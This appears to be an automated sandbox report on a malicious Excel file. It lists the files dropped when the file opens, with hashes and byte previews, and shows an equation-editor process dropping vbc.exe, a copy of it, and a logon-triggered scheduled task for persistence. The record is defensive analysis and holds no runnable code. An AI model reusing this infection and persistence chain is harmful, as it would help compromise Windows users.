                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 440x248, frames 3
                                                          Category:dropped
                                                          Size (bytes):20768
                                                          Entropy (8bit):7.686882804050949
                                                          Encrypted:false
                                                          SSDEEP:384:aGUhYaAJ/l6gEhS9DR+x000vHo2V9Utm3WzbO5Prt3clF3PVTSUHXSJpal5HcYcJ:PUhYa4KE99q000vIG6zboh3sBPVm0Ch
                                                          MD5:A16109E2F019BA636968768623F79C9F
                                                          SHA1:C3C0D03F4EA0443E6E12A60A7C8BF661FEBAD552
                                                          SHA-256:590591AD69D615D5434E71F51254D158ED37AECA921AD624B213E87B61C93EC1
                                                          SHA-512:763A0F5CB9DAD3C6DF5584984B84D8AA3361BD695E93B374FE068C816336D4211BB17AD9B1D005D318C60E7850B32BF07CD82C685B4CBCB89CD1C314DFE7CFF5
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...?..LJp...j.J..K.s.s...."..`m%....g.TzC/.M.?......c..O...B..4.......K.!...|....i.Q.'..O..}h..rD9c.o....?*<....i.S......H.,{....y..G....?*v...z.....b.....<.R.!lq.N.#...wX....1.I...E..H[.S...K..y....9"...Jm......M.p.Z$>..K.}h...P$..&1.R.).K.}h..r.9b'...y).K.}h..r.\...Oz<.....o_Z9b..).`E..:.....g.Om.f.2..A...C...E...p....`-c...*9b.....J{.._Z7.....X...J
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A992A851.emf
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                          Category:dropped
                                                          Size (bytes):3199944
                                                          Entropy (8bit):1.0723286533222698
                                                          Encrypted:false
                                                          SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                                          MD5:6CFA3170A68147326768DE26F5E88F3C
                                                          SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                                          SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                                          SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                                          Malicious:false
                                                          Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ABFED4E2.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):79394
                                                          Entropy (8bit):7.864111100215953
                                                          Encrypted:false
                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                          Malicious:false
                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4DB4F4E.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):50311
                                                          Entropy (8bit):7.960958863022709
                                                          Encrypted:false
                                                          SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                          MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                          SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                          SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                          SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                          Malicious:false
                                                          Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B577E266.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 297x206, frames 3
                                                          Category:dropped
                                                          Size (bytes):17045
                                                          Entropy (8bit):7.887053199978643
                                                          Encrypted:false
                                                          SSDEEP:384:aBmP9i5b2ZgFZqcuyAyUWAULuPMUKOhPz9z+/yWl0:Qrb2lctUWAIuPMU9EBC
                                                          MD5:A750B799988704B96DA4742B3584D86B
                                                          SHA1:F3E11F5A9D8CF802F672B990776552F5503ED230
                                                          SHA-256:258BF1909B6C43D916CFA90FA63BDE0C49B8C0B3D79FD0E806E347282C5D4BD4
                                                          SHA-512:46953438C50E8655794D0E3A345D7F01B2D4049F706CC79FD3BCEE66F0643B6D341CDF8F3CABD4A2A960D7BF6669F71A7069F3ABA3662994BE2798935976366F
                                                          Malicious:false
                                                          Preview: ......JFIF.............C....................................................................C.........................................................................).."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..?.].J...3..F..Ai..:C..iZ...<....*...1..mzj.._.UB...@..x.............?.......J5z.&Y.....>..a.......isJ7m..._.`.?.0.....;.....`.?.0.....;....+.......^...>!h:.....6.n...........>`9 W@..?,|...S.4.:....Dx..0g....|g........G.0g....|g........^......z..-.#w..4.i.....?..Y?`...#F.....`A..w....J.._.....x.`...L....z....t=,....k...v.f.T...#.d..,...#.j.....y..kO....gi.XK.6..
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B645F9C3.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 620 x 392, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):27038
                                                          Entropy (8bit):7.914822491740465
                                                          Encrypted:false
                                                          SSDEEP:768:/pRWSqW77zrixHsfTsJJ5tcvvuyKuVMiwfYz8TXP:vWSzfTc2UuVQyIf
                                                          MD5:B8C84DC628D9E1ACE3B815C0E2CE05AD
                                                          SHA1:D9632A4C35667880A7A5313FB430A3961E29F4C1
                                                          SHA-256:8F4F370BE6C81F2643C00EEC2BF9B6D3AD1FF68E66392741B6DD125163A61958
                                                          SHA-512:BD5A5675106DD16DDD6545555675FB7E2C93244E1B6902E94D95418AF0831911D59BE11991719F0144ABB5E280F1A5C2F9B6340F7D21405ECA2763C81B0DE865
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...l.........s.+{....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs...%...%.IR$...i.IDATx....p[w..y..................3..=.==.m9.r...s.(.....`.9....0.`.I.s y..H.l.n.m......"<........g........!...............|9...kkkj..n.#.....!))...kvvV.. .........\......G.Q.....w......22.ED........S.N......D....!.........L...."...........C,.."...*......Wr.|eeE(..|...,//..$.#......G?:~.8.....s.UX,.......j.nnn...w~....666.u....~^D....>}Z ..D..()<Y>......h4z<..'9...^O.k6.I.H..?GWW.Ilx......uttH.Rr.$.$......gg.......(..<.H....S.^}..7C.x.^z)++..t............900@.........|...f6....F..j5.Mv;y..Y-...*.b.....b....Mf.y..H.0.mv..j.....>..Y.....N.III...8s.........D.........k[YY!...#j5..f.V..n....e2hggfT:..u..t.s.J.zF<N~..V.......\....[......k.r2...J*...h.....x@.{....YRMR.`0........9..r....mmm..f{{{~~............h3....yE.y..#0...LD.N.7.......U...Y..}.g.^<...........?v...cqt...r.<...gn$.]^...S.......<+Y%.Vw.3!..f...6265.....h.X.6+...?
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF1F9F87.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
                                                          Category:dropped
                                                          Size (bytes):22499
                                                          Entropy (8bit):6.65776224633818
                                                          Encrypted:false
                                                          SSDEEP:384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
                                                          MD5:37D204490B7E5C68D1CF8BA1D7BE31E4
                                                          SHA1:F67D5AF4E5381CAB54973D69A8918E974280B795
                                                          SHA-256:4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
                                                          SHA-512:D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
                                                          Malicious:false
                                                          Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB4DF71D.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                          Category:dropped
                                                          Size (bytes):14198
                                                          Entropy (8bit):7.916688725116637
                                                          Encrypted:false
                                                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                          Malicious:false
                                                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEC708B4.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):6815
                                                          Entropy (8bit):7.871668067811304
                                                          Encrypted:false
                                                          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                          MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E259E3DC.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                          Category:dropped
                                                          Size (bytes):8815
                                                          Entropy (8bit):7.944898651451431
                                                          Encrypted:false
                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                          Malicious:false
                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED4DB7B.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):20455
                                                          Entropy (8bit):7.971919017844605
                                                          Encrypted:false
                                                          SSDEEP:384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
                                                          MD5:4BE445245B4530E9136AA45ECC8D18FB
                                                          SHA1:83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
                                                          SHA-256:5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
                                                          SHA-512:E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig|G.X..wo6........!z...!L...R.....M......F)...CJ.K.|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF452740.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
                                                          Category:dropped
                                                          Size (bytes):22499
                                                          Entropy (8bit):6.65776224633818
                                                          Encrypted:false
                                                          SSDEEP:384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
                                                          MD5:37D204490B7E5C68D1CF8BA1D7BE31E4
                                                          SHA1:F67D5AF4E5381CAB54973D69A8918E974280B795
                                                          SHA-256:4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
                                                          SHA-512:D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
                                                          Malicious:false
                                                          Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\tmpE206.tmp
                                                          Process:C:\Users\Public\vbc.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1618
                                                          Entropy (8bit):5.142826469562259
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB7tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3n
                                                          MD5:FCB4B2B204E5B5F96370784C8DFE68E8
                                                          SHA1:8E36774C1B606B285BF38DBC31B12D2FC27FD51B
                                                          SHA-256:C01FA9CD62561C7D84BCD7E7F8BD058E1E4B638FF09B9D92B255D6C7A5168FEF
                                                          SHA-512:9E7C7D4925CC59802808795EC82EA14E68E4DD56252BFC79833C748F551752B1F3D72327AC8BA7E761180886FB9AF1732A0A730174E9C4F1E5CDF746842543FE
                                                          Malicious:true
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:ISO-8859 text, with LF, NEL line terminators
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:PKQtn:P7n
                                                          MD5:9717B0EFF00F808B01DBAA7210C6F9FC
                                                          SHA1:C94EFC4311F6F820D1FA4BF8E80869A0131BA3EE
                                                          SHA-256:F2C442148EC3C1909D5ACF83E6DC8532686CA1E74DC62B4D7144FFBF4B556A24
                                                          SHA-512:475B63E5827CF3D43D50E320E26531DB4EFDC66B2C24CB54F56BFECF23BA07D7284CC97F3B9F78310847289B21227CDD5D13DB5E72DB2D4F048ED509E3370402
                                                          Malicious:true
                                                          Preview: S..,...H
                                                          C:\Users\user\AppData\Roaming\blFUun.exe
                                                          Process:C:\Users\Public\vbc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):792064
                                                          Entropy (8bit):7.348021891570888
                                                          Encrypted:false
                                                          SSDEEP:12288:I4enekLl7hRNLPXlf/BfykeiLmtlzwrbsybFVxXo7Ko7ICfLcA:QFNLPXLxjLm7KoOVxXBjCfLcA
                                                          MD5:6A647FD057FD6A0B85C644D928125EB4
                                                          SHA1:0876B0BD85B3FEA743370B8A7793102DD9328BBB
                                                          SHA-256:74E0F799A11A134C003BDFC626D453E74C92903D0640C8E1C801A78FE715A095
                                                          SHA-512:0800B5ED2A4A608EE58D8679439E62533F9316B9F908D34F48C24A8BB7E106664BCA89E32B2A0C4532B4C736977FA83D03D4EDA980D05C89A35426EC740F7DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 19%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......l......j.... ........@.. ....................................@.....................................O.......4i...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...4i.......j..................@..@.reloc.......`......................@..B................L.......H.......................x................................................0............(#...($.........(.....o%....*.....................(&......('......((......()......(*....*N..(....o....(+....*&..(,....*.s-........s.........s/........s0........s1........*....0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0..<........~.....(7.....,!r...p.....(8...o9...s:............~.....+..*.0......
                                                          C:\Users\user\Desktop\~$PR0078966.xlsx
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):1.4377382811115937
                                                          Encrypted:false
                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                          Malicious:true
                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                          C:\Users\Public\vbc.exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):792064
                                                          Entropy (8bit):7.348021891570888
                                                          Encrypted:false
                                                          SSDEEP:12288:I4enekLl7hRNLPXlf/BfykeiLmtlzwrbsybFVxXo7Ko7ICfLcA:QFNLPXLxjLm7KoOVxXBjCfLcA
                                                          MD5:6A647FD057FD6A0B85C644D928125EB4
                                                          SHA1:0876B0BD85B3FEA743370B8A7793102DD9328BBB
                                                          SHA-256:74E0F799A11A134C003BDFC626D453E74C92903D0640C8E1C801A78FE715A095
                                                          SHA-512:0800B5ED2A4A608EE58D8679439E62533F9316B9F908D34F48C24A8BB7E106664BCA89E32B2A0C4532B4C736977FA83D03D4EDA980D05C89A35426EC740F7DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 19%
